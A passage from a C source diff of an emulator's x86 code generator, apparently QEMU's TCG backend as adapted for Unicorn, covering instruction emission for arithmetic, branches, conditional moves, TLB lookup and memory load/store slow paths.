P_REXB_RM + rexw, dest, src); +} + +static inline void tcg_out_ext16u(TCGContext *s, int dest, int src) +{ + /* movzwl */ + tcg_out_modrm(s, OPC_MOVZWL, dest, src); +} + +static inline void tcg_out_ext16s(TCGContext *s, int dest, int src, int rexw) +{ + /* movsw[lq] */ + tcg_out_modrm(s, OPC_MOVSWL + rexw, dest, src); +} + +static inline void tcg_out_ext32u(TCGContext *s, int dest, int src) +{ + /* 32-bit mov zero extends. 
*/
    tcg_out_modrm(s, OPC_MOVL_GvEv, dest, src);
}

/* Sign-extend the low 32 bits of SRC into 64-bit DEST. */
static inline void tcg_out_ext32s(TCGContext *s, int dest, int src)
{
    tcg_out_modrm(s, OPC_MOVSLQ, dest, src);
}

/* Byte-swap the 64-bit register REG. */
static inline void tcg_out_bswap64(TCGContext *s, int reg)
{
    tcg_out_opc(s, OPC_BSWAP + P_REXW + LOWREGMASK(reg), 0, reg, 0);
}

/* Arithmetic op C with immediate VAL on R0.  CF != 0 means the carry
   flag is live and must not be clobbered differently (disables the
   inc/dec shortcut). */
static void tgen_arithi(TCGContext *s, int c, int r0,
                        tcg_target_long val, int cf)
{
    int rexw = 0;

    if (TCG_TARGET_REG_BITS == 64) {
        rexw = c & -8;
        c &= 7;
    }

    /* ??? While INC is 2 bytes shorter than ADDL $1, they also induce
       partial flags update stalls on Pentium4 and are not recommended
       by current Intel optimization manuals. */
    if (!cf && (c == ARITH_ADD || c == ARITH_SUB) && (val == 1 || val == -1)) {
        int is_inc = (c == ARITH_ADD) ^ (val < 0);
        if (TCG_TARGET_REG_BITS == 64) {
            /* The single-byte increment encodings are re-tasked as the
               REX prefixes.  Use the MODRM encoding. */
            tcg_out_modrm(s, OPC_GRP5 + rexw,
                          (is_inc ? EXT5_INC_Ev : EXT5_DEC_Ev), r0);
        } else {
            tcg_out8(s, (is_inc ? OPC_INC_r32 : OPC_DEC_r32) + r0);
        }
        return;
    }

    if (c == ARITH_AND) {
        if (TCG_TARGET_REG_BITS == 64) {
            if (val == 0xffffffffu) {
                tcg_out_ext32u(s, r0, r0);
                return;
            }
            if (val == (uint32_t)val) {
                /* AND with no high bits set can use a 32-bit operation. */
                rexw = 0;
            }
        }
        if (val == 0xffu && (r0 < 4 || TCG_TARGET_REG_BITS == 64)) {
            tcg_out_ext8u(s, r0, r0);
            return;
        }
        if (val == 0xffffu) {
            tcg_out_ext16u(s, r0, r0);
            return;
        }
    }

    if (val == (int8_t)val) {
        tcg_out_modrm(s, OPC_ARITH_EvIb + rexw, c, r0);
        tcg_out8(s, val);
        return;
    }
    if (rexw == 0 || val == (int32_t)val) {
        tcg_out_modrm(s, OPC_ARITH_EvIz + rexw, c, r0);
        tcg_out32(s, val);
        return;
    }

    /* 64-bit immediates cannot be encoded in one arith insn. */
    tcg_abort();
}

/* Add immediate VAL to 64-bit REG (no-op for VAL == 0). */
static void tcg_out_addi(TCGContext *s, int reg, tcg_target_long val)
{
    if (val != 0) {
        tgen_arithi(s, ARITH_ADD + P_REXW, reg, val, 0);
    }
}

/* Use SMALL != 0 to force a short forward branch.
*/
/* Emit a jump (OPC == -1) or conditional jump OPC to LABEL_INDEX,
   using the 2-byte short form when the displacement fits (or when
   SMALLFLAG forces it), else the long form with a relocation. */
static void tcg_out_jxx(TCGContext *s, int opc, int label_index, int smallflag)
{
    int32_t val, val1;
    TCGLabel *l = &s->labels[label_index];

    if (l->has_value) {
        val = tcg_pcrel_diff(s, l->u.value_ptr);
        val1 = val - 2;                 /* short insn is 2 bytes long */
        if ((int8_t)val1 == val1) {
            if (opc == -1) {
                tcg_out8(s, OPC_JMP_short);
            } else {
                tcg_out8(s, OPC_JCC_short + opc);
            }
            tcg_out8(s, val1);
        } else {
            if (smallflag) {
                /* caller promised a short branch but it doesn't fit */
                tcg_abort();
            }
            if (opc == -1) {
                tcg_out8(s, OPC_JMP_long);
                tcg_out32(s, val - 5);  /* jmp rel32 is 5 bytes */
            } else {
                tcg_out_opc(s, OPC_JCC_long + opc, 0, 0, 0);
                tcg_out32(s, val - 6);  /* jcc rel32 is 6 bytes */
            }
        }
    } else if (smallflag) {
        /* forward reference, short form: 1-byte reloc */
        if (opc == -1) {
            tcg_out8(s, OPC_JMP_short);
        } else {
            tcg_out8(s, OPC_JCC_short + opc);
        }
        tcg_out_reloc(s, s->code_ptr, R_386_PC8, label_index, -1);
        s->code_ptr += 1;
    } else {
        /* forward reference, long form: 4-byte reloc */
        if (opc == -1) {
            tcg_out8(s, OPC_JMP_long);
        } else {
            tcg_out_opc(s, OPC_JCC_long + opc, 0, 0, 0);
        }
        tcg_out_reloc(s, s->code_ptr, R_386_PC32, label_index, -4);
        s->code_ptr += 4;
    }
}

/* Compare ARG1 against ARG2 (immediate if CONST_ARG2), setting flags.
   Comparison against 0 uses the shorter test r,r form. */
static void tcg_out_cmp(TCGContext *s, TCGArg arg1, TCGArg arg2,
                        int const_arg2, int rexw)
{
    if (const_arg2) {
        if (arg2 == 0) {
            /* test r, r */
            tcg_out_modrm(s, OPC_TESTL + rexw, arg1, arg1);
        } else {
            tgen_arithi(s, ARITH_CMP + rexw, arg1, arg2, 0);
        }
    } else {
        tgen_arithr(s, ARITH_CMP + rexw, arg1, arg2);
    }
}

/* 32-bit compare-and-branch. */
static void tcg_out_brcond32(TCGContext *s, TCGCond cond,
                             TCGArg arg1, TCGArg arg2, int const_arg2,
                             int label_index, int smallflag)
{
    tcg_out_cmp(s, arg1, arg2, const_arg2, 0);
    tcg_out_jxx(s, tcg_cond_to_jcc[cond], label_index, smallflag);
}

#if TCG_TARGET_REG_BITS == 64
/* 64-bit compare-and-branch. */
static void tcg_out_brcond64(TCGContext *s, TCGCond cond,
                             TCGArg arg1, TCGArg arg2, int const_arg2,
                             int label_index, int smallflag)
{
    tcg_out_cmp(s, arg1, arg2, const_arg2, P_REXW);
    tcg_out_jxx(s, tcg_cond_to_jcc[cond], label_index, smallflag);
}
#else
/* XXX: we implement it at the target level to avoid having to
   handle cross basic blocks
temporaries */
/* 64-bit compare-and-branch built from two 32-bit halves (args[0]/[1]
   are the low/high words of operand A, args[2]/[3] of operand B;
   args[4] is the condition, args[5] the target label). */
static void tcg_out_brcond2(TCGContext *s, const TCGArg *args,
                            const int *const_args, int smallflag)
{
    int label_next;
    label_next = gen_new_label(s);
    switch(args[4]) {
    case TCG_COND_EQ:
        /* equal only if both halves are; fall out on low mismatch */
        tcg_out_brcond32(s, TCG_COND_NE, args[0], args[2], const_args[2],
                         label_next, 1);
        tcg_out_brcond32(s, TCG_COND_EQ, args[1], args[3], const_args[3],
                         args[5], smallflag);
        break;
    case TCG_COND_NE:
        /* unequal if either half differs */
        tcg_out_brcond32(s, TCG_COND_NE, args[0], args[2], const_args[2],
                         args[5], smallflag);
        tcg_out_brcond32(s, TCG_COND_NE, args[1], args[3], const_args[3],
                         args[5], smallflag);
        break;
    case TCG_COND_LT:
        /* signed compare on high words; unsigned tie-break on low */
        tcg_out_brcond32(s, TCG_COND_LT, args[1], args[3], const_args[3],
                         args[5], smallflag);
        tcg_out_jxx(s, JCC_JNE, label_next, 1);
        tcg_out_brcond32(s, TCG_COND_LTU, args[0], args[2], const_args[2],
                         args[5], smallflag);
        break;
    case TCG_COND_LE:
        tcg_out_brcond32(s, TCG_COND_LT, args[1], args[3], const_args[3],
                         args[5], smallflag);
        tcg_out_jxx(s, JCC_JNE, label_next, 1);
        tcg_out_brcond32(s, TCG_COND_LEU, args[0], args[2], const_args[2],
                         args[5], smallflag);
        break;
    case TCG_COND_GT:
        tcg_out_brcond32(s, TCG_COND_GT, args[1], args[3], const_args[3],
                         args[5], smallflag);
        tcg_out_jxx(s, JCC_JNE, label_next, 1);
        tcg_out_brcond32(s, TCG_COND_GTU, args[0], args[2], const_args[2],
                         args[5], smallflag);
        break;
    case TCG_COND_GE:
        tcg_out_brcond32(s, TCG_COND_GT, args[1], args[3], const_args[3],
                         args[5], smallflag);
        tcg_out_jxx(s, JCC_JNE, label_next, 1);
        tcg_out_brcond32(s, TCG_COND_GEU, args[0], args[2], const_args[2],
                         args[5], smallflag);
        break;
    case TCG_COND_LTU:
        /* unsigned variants use unsigned compare on both halves */
        tcg_out_brcond32(s, TCG_COND_LTU, args[1], args[3], const_args[3],
                         args[5], smallflag);
        tcg_out_jxx(s, JCC_JNE, label_next, 1);
        tcg_out_brcond32(s, TCG_COND_LTU, args[0], args[2], const_args[2],
                         args[5], smallflag);
        break;
    case TCG_COND_LEU:
        tcg_out_brcond32(s, TCG_COND_LTU, args[1], args[3], const_args[3],
                         args[5], smallflag);
    tcg_out_jxx(s, JCC_JNE, label_next, 1);
        tcg_out_brcond32(s, TCG_COND_LEU, args[0], args[2], const_args[2],
                         args[5], smallflag);
        break;
    case TCG_COND_GTU:
        tcg_out_brcond32(s, TCG_COND_GTU, args[1], args[3], const_args[3],
                         args[5], smallflag);
        tcg_out_jxx(s, JCC_JNE, label_next, 1);
        tcg_out_brcond32(s, TCG_COND_GTU, args[0], args[2], const_args[2],
                         args[5], smallflag);
        break;
    case TCG_COND_GEU:
        tcg_out_brcond32(s, TCG_COND_GTU, args[1], args[3], const_args[3],
                         args[5], smallflag);
        tcg_out_jxx(s, JCC_JNE, label_next, 1);
        tcg_out_brcond32(s, TCG_COND_GEU, args[0], args[2], const_args[2],
                         args[5], smallflag);
        break;
    default:
        tcg_abort();
    }
    tcg_out_label(s, label_next, s->code_ptr);
}
#endif

/* 32-bit setcond: DEST = (ARG1 cond ARG2) as 0/1. */
static void tcg_out_setcond32(TCGContext *s, TCGCond cond, TCGArg dest,
                              TCGArg arg1, TCGArg arg2, int const_arg2)
{
    tcg_out_cmp(s, arg1, arg2, const_arg2, 0);
    tcg_out_modrm(s, OPC_SETCC | tcg_cond_to_jcc[cond], 0, dest);
    /* setcc writes only the low byte; widen to the full register */
    tcg_out_ext8u(s, dest, dest);
}

#if TCG_TARGET_REG_BITS == 64
/* 64-bit setcond: DEST = (ARG1 cond ARG2) as 0/1. */
static void tcg_out_setcond64(TCGContext *s, TCGCond cond, TCGArg dest,
                              TCGArg arg1, TCGArg arg2, int const_arg2)
{
    tcg_out_cmp(s, arg1, arg2, const_arg2, P_REXW);
    tcg_out_modrm(s, OPC_SETCC | tcg_cond_to_jcc[cond], 0, dest);
    tcg_out_ext8u(s, dest, dest);
}
#else
/* setcond over a 64-bit value represented as two 32-bit halves. */
static void tcg_out_setcond2(TCGContext *s, const TCGArg *args,
                             const int *const_args)
{
    TCGArg new_args[6];
    int label_true, label_over;

    memcpy(new_args, args+1, 5*sizeof(TCGArg));

    if (args[0] == args[1] || args[0] == args[2]
        || (!const_args[3] && args[0] == args[3])
        || (!const_args[4] && args[0] == args[4])) {
        /* When the destination overlaps with one of the argument
           registers, don't do anything tricky.
*/
        label_true = gen_new_label(s);
        label_over = gen_new_label(s);

        new_args[5] = label_true;
        tcg_out_brcond2(s, new_args, const_args+1, 1);

        tcg_out_movi(s, TCG_TYPE_I32, args[0], 0);
        tcg_out_jxx(s, JCC_JMP, label_over, 1);
        tcg_out_label(s, label_true, s->code_ptr);

        tcg_out_movi(s, TCG_TYPE_I32, args[0], 1);
        tcg_out_label(s, label_over, s->code_ptr);
    } else {
        /* When the destination does not overlap one of the arguments,
           clear the destination first, jump if cond false, and emit an
           increment in the true case.  This results in smaller code. */

        tcg_out_movi(s, TCG_TYPE_I32, args[0], 0);

        label_over = gen_new_label(s);
        new_args[4] = tcg_invert_cond(new_args[4]);
        new_args[5] = label_over;
        tcg_out_brcond2(s, new_args, const_args+1, 1);

        tgen_arithi(s, ARITH_ADD, args[0], 1, 0);
        tcg_out_label(s, label_over, s->code_ptr);
    }
}
#endif

/* 32-bit movcond: DEST = (C1 cond C2) ? V1 : DEST.  Uses cmov when
   available, otherwise a conditional branch around a mov. */
static void tcg_out_movcond32(TCGContext *s, TCGCond cond, TCGArg dest,
                              TCGArg c1, TCGArg c2, int const_c2,
                              TCGArg v1)
{
    tcg_out_cmp(s, c1, c2, const_c2, 0);
    if (have_cmov) {
        tcg_out_modrm(s, OPC_CMOVCC | tcg_cond_to_jcc[cond], dest, v1);
    } else {
        int over = gen_new_label(s);
        tcg_out_jxx(s, tcg_cond_to_jcc[tcg_invert_cond(cond)], over, 1);
        tcg_out_mov(s, TCG_TYPE_I32, dest, v1);
        tcg_out_label(s, over, s->code_ptr);
    }
}

#if TCG_TARGET_REG_BITS == 64
/* 64-bit movcond; cmov is always available on x86-64. */
static void tcg_out_movcond64(TCGContext *s, TCGCond cond, TCGArg dest,
                              TCGArg c1, TCGArg c2, int const_c2,
                              TCGArg v1)
{
    tcg_out_cmp(s, c1, c2, const_c2, P_REXW);
    tcg_out_modrm(s, OPC_CMOVCC | tcg_cond_to_jcc[cond] | P_REXW, dest, v1);
}
#endif

/* Emit a call (CALL != 0) or jump to DEST, going through scratch
   register R10 when the rel32 displacement does not reach. */
static void tcg_out_branch(TCGContext *s, int call, tcg_insn_unit *dest)
{
    intptr_t disp = tcg_pcrel_diff(s, dest) - 5;

    if (disp == (int32_t)disp) {
        tcg_out_opc(s, call ? OPC_CALL_Jz : OPC_JMP_long, 0, 0, 0);
        tcg_out32(s, disp);
    } else {
        tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R10, (uintptr_t)dest);
        tcg_out_modrm(s, OPC_GRP5,
                      call ?
EXT5_CALLN_Ev : EXT5_JMPN_Ev, TCG_REG_R10);
    }
}

static inline void tcg_out_call(TCGContext *s, tcg_insn_unit *dest)
{
    tcg_out_branch(s, 1, dest);
}

static void tcg_out_jmp(TCGContext *s, tcg_insn_unit *dest)
{
    tcg_out_branch(s, 0, dest);
}

#if defined(CONFIG_SOFTMMU)
/* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr,
 *                                     int mmu_idx, uintptr_t ra)
 */
/* Indexed by TCGMemOp; MSVC lacks designated initializers, so the
   table is written positionally there. */
static void * const qemu_ld_helpers[16] = {
#ifdef _MSC_VER
    helper_ret_ldub_mmu,            // MO_UB
# ifdef HOST_WORDS_BIGENDIAN
    helper_be_lduw_mmu,             // MO_BEUW
    helper_be_ldul_mmu,             // MO_BEUL
    helper_be_ldq_mmu,              // MO_BEQ
    0,                              // MO_SB
    0,                              // MO_BESW
    0,                              // MO_BESL
    0,                              // n/a
    0,                              // n/a
    helper_le_lduw_mmu,             // MO_LEUW
    helper_le_ldul_mmu,             // MO_LEUL
    helper_le_ldq_mmu,              // MO_LEQ
    0,                              // n/a
    0,                              // MO_LESW
    0,                              // MO_LESL
    0,                              // n/a
# else  // !HOST_WORDS_BIGENDIAN
    helper_le_lduw_mmu,             // MO_LEUW
    helper_le_ldul_mmu,             // MO_LEUL
    helper_le_ldq_mmu,              // MO_LEQ
    0,                              // MO_SB
    0,                              // MO_LESW
    0,                              // MO_LESL
    0,                              // n/a
    0,                              // n/a
    helper_be_lduw_mmu,             // MO_BEUW
    helper_be_ldul_mmu,             // MO_BEUL
    helper_be_ldq_mmu,              // MO_BEQ
    0,                              // n/a
    0,                              // MO_BESW
    0,                              // MO_BESL
    0,                              // n/a
# endif // HOST_WORDS_BIGENDIAN

#else //_MSC_VER
    [MO_UB]   = helper_ret_ldub_mmu,
    [MO_LEUW] = helper_le_lduw_mmu,
    [MO_LEUL] = helper_le_ldul_mmu,
    [MO_LEQ]  = helper_le_ldq_mmu,
    [MO_BEUW] = helper_be_lduw_mmu,
    [MO_BEUL] = helper_be_ldul_mmu,
    [MO_BEQ]  = helper_be_ldq_mmu,
#endif // _MSC_VER
};

/* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr,
 *                                     uintxx_t val, int mmu_idx, uintptr_t ra)
 */
static void * const qemu_st_helpers[16] = {
#ifdef _MSC_VER
    helper_ret_stb_mmu,             // MO_UB
# ifdef HOST_WORDS_BIGENDIAN
    helper_be_stw_mmu,              // MO_BEUW
    helper_be_stl_mmu,              // MO_BEUL
    helper_be_stq_mmu,              // MO_BEQ
    0,                              // MO_SB
    0,                              // MO_BESW
    0,                              // MO_BESL
    0,                              // n/a
    0,                              // n/a
    helper_le_stw_mmu,              // MO_LEUW
    helper_le_stl_mmu,              // MO_LEUL
helper_le_stq_mmu,              // MO_LEQ
    0,                              // n/a
    0,                              // MO_LESW
    0,                              // MO_LESL
    0,                              // n/a
# else  // !HOST_WORDS_BIGENDIAN
    helper_le_stw_mmu,              // MO_LEUW
    helper_le_stl_mmu,              // MO_LEUL
    helper_le_stq_mmu,              // MO_LEQ
    0,                              // MO_SB
    0,                              // MO_LESW
    0,                              // MO_LESL
    0,                              // n/a
    0,                              // n/a
    helper_be_stw_mmu,              // MO_BEUW
    helper_be_stl_mmu,              // MO_BEUL
    helper_be_stq_mmu,              // MO_BEQ
    0,                              // n/a
    0,                              // MO_BESW
    0,                              // MO_BESL
    0,                              // n/a
# endif // HOST_WORDS_BIGENDIAN

#else //_MSC_VER
    [MO_UB]   = helper_ret_stb_mmu,
    [MO_LEUW] = helper_le_stw_mmu,
    [MO_LEUL] = helper_le_stl_mmu,
    [MO_LEQ]  = helper_le_stq_mmu,
    [MO_BEUW] = helper_be_stw_mmu,
    [MO_BEUL] = helper_be_stl_mmu,
    [MO_BEQ]  = helper_be_stq_mmu,
#endif // _MSC_VER
};

/* Perform the TLB load and compare.

   Inputs:
   ADDRLO and ADDRHI contain the low and high part of the address.

   MEM_INDEX and S_BITS are the memory context and log2 size of the load.

   WHICH is the offset into the CPUTLBEntry structure of the slot to read.
   This should be offsetof addr_read or addr_write.

   Outputs:
   LABEL_PTRS is filled with 1 (32-bit addresses) or 2 (64-bit addresses)
   positions of the displacements of forward jumps to the TLB miss case.

   Second argument register is loaded with the low part of the address.
   In the TLB hit case, it has been adjusted as indicated by the TLB
   and so is a host address.  In the TLB miss case, it continues to
   hold a guest address.

   First argument register is clobbered.
*/

static inline void tcg_out_tlb_load(TCGContext *s, TCGReg addrlo, TCGReg addrhi,
                                    int mem_index, TCGMemOp s_bits,
                                    tcg_insn_unit **label_ptr, int which)
{
    const TCGReg r0 = TCG_REG_L0;
    const TCGReg r1 = TCG_REG_L1;
    /* ttype/trexw: width of the guest (target) address;
       htype/hrexw: width of a host pointer. */
    TCGType ttype = TCG_TYPE_I32;
    TCGType htype = TCG_TYPE_I32;
    int trexw = 0, hrexw = 0;

    if (TCG_TARGET_REG_BITS == 64) {
        if (TARGET_LONG_BITS == 64) {
            ttype = TCG_TYPE_I64;
            trexw = P_REXW;
        }
        if (TCG_TYPE_PTR == TCG_TYPE_I64) {
            htype = TCG_TYPE_I64;
            hrexw = P_REXW;
        }
    }

    tcg_out_mov(s, htype, r0, addrlo);
    tcg_out_mov(s, ttype, r1, addrlo);

    /* r0 = TLB index bits of the address */
    tcg_out_shifti(s, SHIFT_SHR + hrexw, r0,
                   TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS);

    /* r1 = page-aligned address with low access-size bits kept so an
       unaligned access fails the compare */
    tgen_arithi(s, ARITH_AND + trexw, r1,
                TARGET_PAGE_MASK | ((1 << s_bits) - 1), 0);
    tgen_arithi(s, ARITH_AND + hrexw, r0,
                (CPU_TLB_SIZE - 1) << CPU_TLB_ENTRY_BITS, 0);

    /* r0 = &env->tlb_table[mem_index][index].{addr_read,addr_write} */
    tcg_out_modrm_sib_offset(s, OPC_LEA + hrexw, r0, TCG_AREG0, r0, 0,
                             offsetof(CPUArchState, tlb_table[mem_index][0])
                             + which);

    /* cmp 0(r0), r1 */
    tcg_out_modrm_offset(s, OPC_CMP_GvEv + trexw, r1, r0, 0);

    /* Prepare for both the fast path add of the tlb addend, and the slow
       path function argument setup.  There are two cases worth note:
       For 32-bit guest and x86_64 host, MOVL zero-extends the guest address
       before the fastpath ADDQ below.  For 64-bit guest and x32 host, MOVQ
       copies the entire guest address for the slow path, while truncation
       for the 32-bit host happens with the fastpath ADDL below.
*/
    tcg_out_mov(s, ttype, r1, addrlo);

    // Unicorn: fast path if hookmem is not enable
    if (!HOOK_EXISTS(s->uc, UC_HOOK_MEM_READ) && !HOOK_EXISTS(s->uc, UC_HOOK_MEM_WRITE))
        tcg_out_opc(s, OPC_JCC_long + JCC_JNE, 0, 0, 0);
    else
        tcg_out_opc(s, OPC_JMP_long, 0, 0, 0); /* slow_path */
    label_ptr[0] = s->code_ptr;
    s->code_ptr += 4;

    if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) {
        /* cmp 4(r0), addrhi */
        tcg_out_modrm_offset(s, OPC_CMP_GvEv, addrhi, r0, 4);

        /* jne slow_path */
        tcg_out_opc(s, OPC_JCC_long + JCC_JNE, 0, 0, 0);
        label_ptr[1] = s->code_ptr;
        s->code_ptr += 4;
    }

    /* TLB Hit.  */

    /* add addend(r0), r1 */
    tcg_out_modrm_offset(s, OPC_ADD_GvEv + hrexw, r1, r0,
                         offsetof(CPUTLBEntry, addend) - which);
}

/*
 * Record the context of a call to the out of line helper code for the slow path
 * for a load or store, so that we can later generate the correct helper code
 */
static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOp opc,
                                TCGReg datalo, TCGReg datahi,
                                TCGReg addrlo, TCGReg addrhi,
                                int mem_index, tcg_insn_unit *raddr,
                                tcg_insn_unit **label_ptr)
{
    TCGLabelQemuLdst *label = new_ldst_label(s);

    label->is_ld = is_ld;
    label->opc = opc;
    label->datalo_reg = datalo;
    label->datahi_reg = datahi;
    label->addrlo_reg = addrlo;
    label->addrhi_reg = addrhi;
    label->mem_index = mem_index;
    label->raddr = raddr;
    label->label_ptr[0] = label_ptr[0];
    /* second patch site exists only for 64-bit guest on 32-bit host */
    if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) {
        label->label_ptr[1] = label_ptr[1];
    }
}

/*
 * Generate code for the slow path for a load at the end of block
 */
static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l)
{
    TCGMemOp opc = l->opc;
    TCGReg data_reg;
    tcg_insn_unit **label_ptr = &l->label_ptr[0];

    /* resolve label address */
    tcg_patch32(label_ptr[0], s->code_ptr - label_ptr[0] - 4);
    if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) {
        tcg_patch32(label_ptr[1], s->code_ptr - label_ptr[1] - 4);
    }

    if
(TCG_TARGET_REG_BITS == 32) {
        /* 32-bit host: helper arguments go on the stack */
        int ofs = 0;

        tcg_out_st(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, ofs);
        ofs += 4;

        tcg_out_st(s, TCG_TYPE_I32, l->addrlo_reg, TCG_REG_ESP, ofs);
        ofs += 4;

        if (TARGET_LONG_BITS == 64) {
            tcg_out_st(s, TCG_TYPE_I32, l->addrhi_reg, TCG_REG_ESP, ofs);
            ofs += 4;
        }

        tcg_out_sti(s, TCG_TYPE_I32, TCG_REG_ESP, ofs, l->mem_index);
        ofs += 4;

        tcg_out_sti(s, TCG_TYPE_I32, TCG_REG_ESP, ofs, (uintptr_t)l->raddr);
    } else {
        /* 64-bit host: arguments go in registers */
        tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0);
        /* The second argument is already loaded with addrlo.  */
        tcg_out_movi(s, TCG_TYPE_I32, tcg_target_call_iarg_regs[2],
                     l->mem_index);
        tcg_out_movi(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[3],
                     (uintptr_t)l->raddr);
    }

    tcg_out_call(s, qemu_ld_helpers[opc & ~MO_SIGN]); // qq

    /* move/extend the helper's return value into the destination */
    data_reg = l->datalo_reg;
    switch (opc & MO_SSIZE) {
    case MO_SB:
        tcg_out_ext8s(s, data_reg, TCG_REG_EAX, P_REXW);
        break;
    case MO_SW:
        tcg_out_ext16s(s, data_reg, TCG_REG_EAX, P_REXW);
        break;
#if TCG_TARGET_REG_BITS == 64
    case MO_SL:
        tcg_out_ext32s(s, data_reg, TCG_REG_EAX);
        break;
#endif
    case MO_UB:
    case MO_UW:
        /* Note that the helpers have zero-extended to tcg_target_long.
*/
    case MO_UL:
        tcg_out_mov(s, TCG_TYPE_I32, data_reg, TCG_REG_EAX);
        break;
    case MO_Q:
        if (TCG_TARGET_REG_BITS == 64) {
            tcg_out_mov(s, TCG_TYPE_I64, data_reg, TCG_REG_RAX);
        } else if (data_reg == TCG_REG_EDX) {
            /* xchg %edx, %eax */
            tcg_out_opc(s, OPC_XCHG_ax_r32 + TCG_REG_EDX, 0, 0, 0);
            tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_EAX);
        } else {
            tcg_out_mov(s, TCG_TYPE_I32, data_reg, TCG_REG_EAX);
            tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_EDX);
        }
        break;
    default:
        tcg_abort();
    }

    /* Jump to the code corresponding to next IR of qemu_st */
    tcg_out_jmp(s, l->raddr);
}

/*
 * Generate code for the slow path for a store at the end of block
 */
static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l)
{
    TCGMemOp opc = l->opc;
    TCGMemOp s_bits = opc & MO_SIZE;
    tcg_insn_unit **label_ptr = &l->label_ptr[0];
    TCGReg retaddr;

    /* resolve label address */
    tcg_patch32(label_ptr[0], s->code_ptr - label_ptr[0] - 4);
    if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) {
        tcg_patch32(label_ptr[1], s->code_ptr - label_ptr[1] - 4);
    }

    if (TCG_TARGET_REG_BITS == 32) {
        /* 32-bit host: helper arguments go on the stack */
        int ofs = 0;

        tcg_out_st(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, ofs);
        ofs += 4;

        tcg_out_st(s, TCG_TYPE_I32, l->addrlo_reg, TCG_REG_ESP, ofs);
        ofs += 4;

        if (TARGET_LONG_BITS == 64) {
            tcg_out_st(s, TCG_TYPE_I32, l->addrhi_reg, TCG_REG_ESP, ofs);
            ofs += 4;
        }

        tcg_out_st(s, TCG_TYPE_I32, l->datalo_reg, TCG_REG_ESP, ofs);
        ofs += 4;

        if (s_bits == MO_64) {
            tcg_out_st(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_ESP, ofs);
            ofs += 4;
        }

        tcg_out_sti(s, TCG_TYPE_I32, TCG_REG_ESP, ofs, l->mem_index);
        ofs += 4;

        retaddr = TCG_REG_EAX;
        tcg_out_movi(s, TCG_TYPE_I32, retaddr, (uintptr_t)l->raddr);
        tcg_out_st(s, TCG_TYPE_I32, retaddr, TCG_REG_ESP, ofs);
    } else {
        tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0);
        /* The second argument is already loaded with addrlo.
*/ + tcg_out_mov(s, (s_bits == MO_64 ? TCG_TYPE_I64 : TCG_TYPE_I32), + tcg_target_call_iarg_regs[2], l->datalo_reg); + tcg_out_movi(s, TCG_TYPE_I32, tcg_target_call_iarg_regs[3], + l->mem_index); + + if (ARRAY_SIZE(tcg_target_call_iarg_regs) > 4) { + retaddr = tcg_target_call_iarg_regs[4]; + tcg_out_movi(s, TCG_TYPE_PTR, retaddr, (uintptr_t)l->raddr); + } else { + retaddr = TCG_REG_RAX; + tcg_out_movi(s, TCG_TYPE_PTR, retaddr, (uintptr_t)l->raddr); + tcg_out_st(s, TCG_TYPE_PTR, retaddr, TCG_REG_ESP, + TCG_TARGET_CALL_STACK_OFFSET); + } + } + + /* "Tail call" to the helper, with the return address back inline. */ + tcg_out_push(s, retaddr); + tcg_out_jmp(s, qemu_st_helpers[opc]); +} +#elif defined(__x86_64__) && defined(__linux__) +# include +# include + +int arch_prctl(int code, unsigned long addr); + +static inline void setup_guest_base_seg(TCGContext *s) +{ + if (arch_prctl(ARCH_SET_GS, GUEST_BASE) == 0) { + s->guest_base_flags = P_GS; + } +} +#else +static inline void setup_guest_base_seg(TCGContext *s) { } +#endif /* SOFTMMU */ + +static void tcg_out_qemu_ld_direct(TCGContext *s, TCGReg datalo, TCGReg datahi, + TCGReg base, intptr_t ofs, int seg, + TCGMemOp memop) +{ + const TCGMemOp real_bswap = memop & MO_BSWAP; + TCGMemOp bswap = real_bswap; + int movop = OPC_MOVL_GvEv; + + if (s->have_movbe && real_bswap) { + bswap = 0; + movop = OPC_MOVBE_GyMy; + } + + switch (memop & MO_SSIZE) { + case MO_UB: + tcg_out_modrm_offset(s, OPC_MOVZBL + seg, datalo, base, ofs); + break; + case MO_SB: + tcg_out_modrm_offset(s, OPC_MOVSBL + P_REXW + seg, datalo, base, ofs); + break; + case MO_UW: + tcg_out_modrm_offset(s, OPC_MOVZWL + seg, datalo, base, ofs); + if (real_bswap) { + tcg_out_rolw_8(s, datalo); + } + break; + case MO_SW: + if (real_bswap) { + if (s->have_movbe) { + tcg_out_modrm_offset(s, OPC_MOVBE_GyMy + P_DATA16 + seg, + datalo, base, ofs); + } else { + tcg_out_modrm_offset(s, OPC_MOVZWL + seg, datalo, base, ofs); + tcg_out_rolw_8(s, datalo); + } + tcg_out_modrm(s, 
OPC_MOVSWL + P_REXW, datalo, datalo);
        } else {
            tcg_out_modrm_offset(s, OPC_MOVSWL + P_REXW + seg,
                                 datalo, base, ofs);
        }
        break;
    case MO_UL:
        tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs);
        if (bswap) {
            tcg_out_bswap32(s, datalo);
        }
        break;
#if TCG_TARGET_REG_BITS == 64
    case MO_SL:
        if (real_bswap) {
            /* load+swap first, then sign-extend the 32-bit result */
            tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs);
            if (bswap) {
                tcg_out_bswap32(s, datalo);
            }
            tcg_out_ext32s(s, datalo, datalo);
        } else {
            tcg_out_modrm_offset(s, OPC_MOVSLQ + seg, datalo, base, ofs);
        }
        break;
#endif
    case MO_Q:
        if (TCG_TARGET_REG_BITS == 64) {
